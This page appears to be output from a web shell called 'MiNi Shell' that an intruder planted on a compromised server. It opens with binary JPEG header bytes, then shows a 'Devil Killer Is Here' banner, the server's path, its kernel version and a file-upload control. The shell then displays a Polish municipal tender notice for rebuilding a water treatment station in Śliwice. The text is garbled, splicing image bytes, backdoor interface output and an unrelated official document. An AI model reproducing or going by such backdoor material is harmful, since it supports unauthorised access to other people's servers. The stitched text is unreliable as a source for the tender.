JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211228/0033416201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa stacji uzdatniania wody w miejscowości Śliwice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Śliwice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351140</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ks. dra St. Sychowskiego 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Śliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-530</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52 33 40 710</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@sliwice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.sliwice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa stacji uzdatniania wody w miejscowości Śliwice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6a388186-67cc-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00334162</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003066/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa stacji uzdatniania wody w Śliwicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między zamawiającym<br/>a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem<br/>miniPortalu, który dostępny jest pod adresem https://miniportal.uzp.gov.pl/, ePUAP-u dostępnego pod<br/>adresem https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: przetargi@sliwice.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)<br/>Postępowanie o udzielenie zamówienia prowadzone jest w języku polskim przy użyciu środków<br/>komunikacji elektronicznej za pośrednictwem miniPortalu pod adresem<br/>https://miniportal.uzp.gov.pl/, ePUAP u pod adresem https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej przetargi@sliwice.pl<br/>2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>„Formularz do złożenia, zmiany, wycofania oferty lub wniosku&#34; oraz do „Formularza do komunikacji”.<br/>3) Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>4) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do komunikacji” wynosi 150 MB.<br/>5) Dane postępowanie można wyszukać na Liście wszystkich postępowań w miniPortalu klikając<br/>wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>2. Złożenie oferty:<br/>1) Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. 2) Ofertę należy<br/>zaszyfrować. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w<br/>„Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/.<br/>3) Opis sposobu przygotowania oferty zawarty jest w rozdziale XII SWZ.<br/>4) Za datę przekazania oferty przyjmuje się datę jej przekazania na ePUAP.<br/>3. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert oraz<br/>załączników składanych wraz z ofertą) 1) W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami<br/>w szczególności składanie oświadczeń, wniosków (innych niż oferty i załączniki składane wraz z<br/>ofertą), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem<br/>dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal”: „Formularz<br/>do komunikacji”. Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana.<br/>2) Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email: przetargi@sliwice.pl.<br/>3) We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia (BZP lub ID postępowania).<br/>4) Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email:<br/>przetargi@sliwice.pl.<br/>5) Za datę przekazania oświadczeń, wniosków, zawiadomień, podmiotowych środków dowodowych<br/>(innych niż oferty i załączniki składane wraz z ofertą) oraz informacji przyjmuje się datę ich przekazania<br/>na ePUAP lub na adres poczty elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. administratorem Pani/Pana danych osobowych jest Gmina Śliwice reprezentowana przez Wójta<br/>Gminy Śliwice, z siedzibą Urzędu Gminy ul. ks. dra Sychowskiego 30, 89-530 Śliwice;<br/>2. administrator wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować poprzez<br/>adres poczty elektronicznej iod.gmina@sliwice.pl lub pisemnie na adres Urzędu Gminy;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie<br/>podstawowym na podstawie art. 275 ust 1 ustawy;<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy;<br/>5. Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celów<br/>określonych w pkt 3, a po tym czasie przez okres wymagany przez przepisy powszechnie<br/>obowiązującego prawa;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8. posiada Pani/Pan: 1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących; 2) na<br/>podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może<br/>naruszać integralności protokołu oraz jego załączników); 3) na podstawie art. 18 RODO prawo żądania<br/>od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9. nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZ.271.1.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest ,,Przebudowa i remont stacji uzdatniania wody w miejscowości<br/>Śliwice”.<br/>2. Inwestycja jest finansowana ze środków Rządowego Funduszu Inwestycji Lokalnych.<br/>3. Realizacja przedmiotu zamówienia będzie odbywała się na działce o nr ewid. 630/1 i 630<br/>obręb Śliwice.<br/>4. Przedmiot zamówienia obejmuje m. in.:<br/>a. roboty branży budowlanej m. in.: roboty rozbiórkowe w budynku SUW, fundamenty, ściany i<br/>strop w budynku, stolarka okienna i drzwiowa, fundamenty pod zbiorniki i pompy, schody<br/>wewnętrzne stalowe, posadzki, wykończenia wewnętrzne, instalacja wodno-kanalizacyjna<br/>wewnętrzna, instalacja wentylacji, dach, elewacja, fundamenty pod zbiorniki retencyjne,<br/>fundament pod agregat prądotwórczy, demontaż istniejącego zbiornika wyrównawczego<br/>terenowego, demontaż ogrodzenia, demontaż istniejącego odstojnika wód popłucznych,<br/>rozbiórka istniejących nawierzchni, montaż ogrodzenia, nawierzchnie na terenie SUW;<br/>b. roboty branży sanitarnej m. in.: technologia uzdatniania wody, kanały kanalizacji<br/>technologicznej wód popłucznych wraz z budową odstojnika wód popłucznych, kanały kanalizacji<br/>sanitarnej zewnętrznej grawitacyjno-tłocznej z zabudową przepompowni ścieków, kanały<br/>kanalizacji deszczowej grawitacyjnej, przewody wodociągowe zewnętrzne wody surowej,<br/>przewody wodociągowe zewnętrzne technologiczne, montaż zbiorników wody uzdatnionej,<br/>przewody wodociągowe wody uzdatnionej;<br/>c. roboty branży elektrycznej m. in.: demontaż istniejącej instalacji elektrycznej, wykonanie<br/>wewnętrznej linii zasilającej od złącza kablowo-pomiarowego do rozdzielnicy głównej w<br/>budynku, wykonanie i montaż rozdzielnicy głównej, montaż agregatu prądotwórczego wraz z<br/>układem samoczynnego załączenia rezerwy, rozdzielni zasilająco-sterowniczej technologicznej<br/>RZS-T, i hydroforowej RZS-ZH, wykonanie instalacji oświetlenia ogólnego, gniazdek wtyczkowych i zasilającej urządzenia technologiczne stacji, wykonanie okablowania<br/>technologicznego i sterowniczego, wymiana kabli zasilających i sygnalizacyjnych od budynku<br/>stacji do studni głębinowych, wykonanie połączeń wyrównawczych.<br/>6. Szczegółowy opis przedmiotu zamówienia zawarty jest w projekcie budowlanym stanowiącej<br/>Załącznik Nr 8 do SWZ, Specyfikacjach Technicznych Wykonania i Odbioru Robót<br/>Budowlanych, stanowiących Załączniki Nr 10 do SWZ 6, przedmiarach robót, stanowiących Załączniki nr 9 oraz w wyjaśnieniach, które wpłynęły do postepowania na „Przebudowę stacji uzdatniania wody w miejscowości Śliwice” znak IZ.271.1.4.2021, które zostało unieważnione. <br/>7. Wykonawca jest zobowiązany zapewnić w trakcie realizacji umowy, prawidłową pracę<br/>istniejącej stacji uzdatniania wody do momentu oddania do użytku oraz uruchomienia<br/>przebudowanej SUW, celem zapewnienia nieprzerwanej dostawy do odbiorców wody pitnej o<br/>odpowiedniej jakości oraz pod odpowiednim ciśnieniem – zgodnie z Rozporządzeniem Ministra<br/>Zdrowia z dnia 7 grudnia 2017 r. w sprawie jakości wody przeznaczonej do spożycia przez ludzi<br/>(Dz. U. z 2017 r. poz. 2294). Wszelkie planowane wyłączenia pracy istniejącej SUW,<br/>każdorazowo muszą być uzgadnianie z Zamawiającym. Ciągłości dostaw wody w trakcie<br/>prowadzonej inwestycji nie zapewni Stacja Uzdatniania Wody w Śliwicach.<br/>8. Wszelkie materiały użyteczne z rozbiórki, urządzenia i armatura stanowią własność<br/>Zamawiającego i Wykonawca przetransportuje je oraz złoży we wskazanym przez<br/>Zamawiającego miejscu w ramach wynagrodzenia ustalonego w umowie. Materiał użyteczny<br/>uzyskany z rozbiórki należy przetransportować na miejsce składowania wskazane przez<br/>Zamawiającego, na odległość do 5 km.<br/>10. Wykonawca jest zobowiązany do uzyskania dla wody uzdatnionej parametrów fizykochemicznych<br/>i bakteriologicznych wody zgodnych z normami określonymi w rozporządzeniu<br/>Ministra Zdrowia z dnia 7 grudnia 2017 r. w sprawie jakości wody przeznaczonej do spożycia<br/>przez ludzi (Dz. U. z 2017 r. poz. 2294).<br/>11. Wykonawca zobowiązuje się do zrealizowania wszystkich robót zgodnie z zasadami sztuki<br/>budowlanej i wiedzy technicznej, obowiązującymi normami oraz dokumentacją projektową,<br/>umową i uzgodnieniami dokonanymi w trakcie realizacji umowy.<br/>12. Zastosowane materiały i urządzenia winny odpowiadać deklaracjom zgodności z Polskimi<br/>Normami, atestami i aprobatami technicznymi. Podane w niniejszej SWZ, w dokumentacji<br/>projektowej, przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót nazwy<br/>własne (pochodzenie, producent, itd.) mają jedynie charakter pomocniczy dla określenia<br/>podstawowych parametrów i cech zastosowanych materiałów, produktów, urządzeń czy<br/>wyposażenia. Zamawiający dopuszcza zastosowanie rozwiązań równoważnych. Produkt<br/>równoważny to taki, który ma te same cechy funkcjonalne, co wskazany w dokumentacji<br/>konkretny z nazwy lub pochodzenia produkt. Jego jakość nie może być gorsza od jakości<br/>określonego w specyfikacji i dokumentacji budowlanej produktu oraz powinien mieć parametry<br/>nie gorsze niż wskazany produkt. Wykonawca, który powołuje się na rozwiązania równoważne<br/>opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego<br/>produkty spełniają wymagania stawiane przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232430-5 - Roboty w zakresie uzdatniania wody</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233226-9 - Roboty budowlane w zakresie dróg dojazdowych</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie<br/>odrzuconych na podstawie kryteriów oceny ofert określonych w SWZ. 2. Przy wyborze ofert<br/>Zamawiający kierować się będzie następującym kryterium: A - Cena (waga 60%), B - Okres gwarancji<br/>jakości (waga 40%). 3. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane<br/>są punkty za powyższe kryteria. Zastosowanie będzie miał następujący wzór: P<br/>(punkty) = A+B 4. Za ofertę najkorzystniejszą zostanie uznana ta, która uzyskała największą ilość<br/>punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dla uznania, że Wykonawca spełnia warunek, o którym mowa w pkt. 1, Zamawiający wymaga, aby Wykonawca wykazał, że:<br/>1)	posiada doświadczenie polegające na wykonaniu co najmniej jednej roboty budowlanej w zakresie budowy, przebudowy, rozbudowy lub remontu stacji uzdatniania wody w technologii kompletnych prefabrykowanych modułów technologicznych i filtracji ciśnieniowej o wydajności technologii uzdatniania wody nie mniejszej niż Qmaxh=60,0 m3/h oraz kompletnej technologii oczyszczania wód popłucznych o minimalnej wydajności Qhmax=2,0 m3/h z ponownym wykorzystaniem wody oczyszczonej w podstawowym procesie uzdatniania o wartości nie mniejszej niż 2 000 000,00 zł brutto, wykonanej nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których robota ta została wykonana z załączeniem dowodu określającego, czy ta robota budowlana została wykonana, oraz załączeniem dowodów określających, czy ta robota budowlana została wykonana należycie,<br/>2)	skieruje do realizacji przedmiotowego zamówienia co najmniej jedną osobę pełniącą funkcję kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej <br/>lub inne uprawnienia umożliwiające 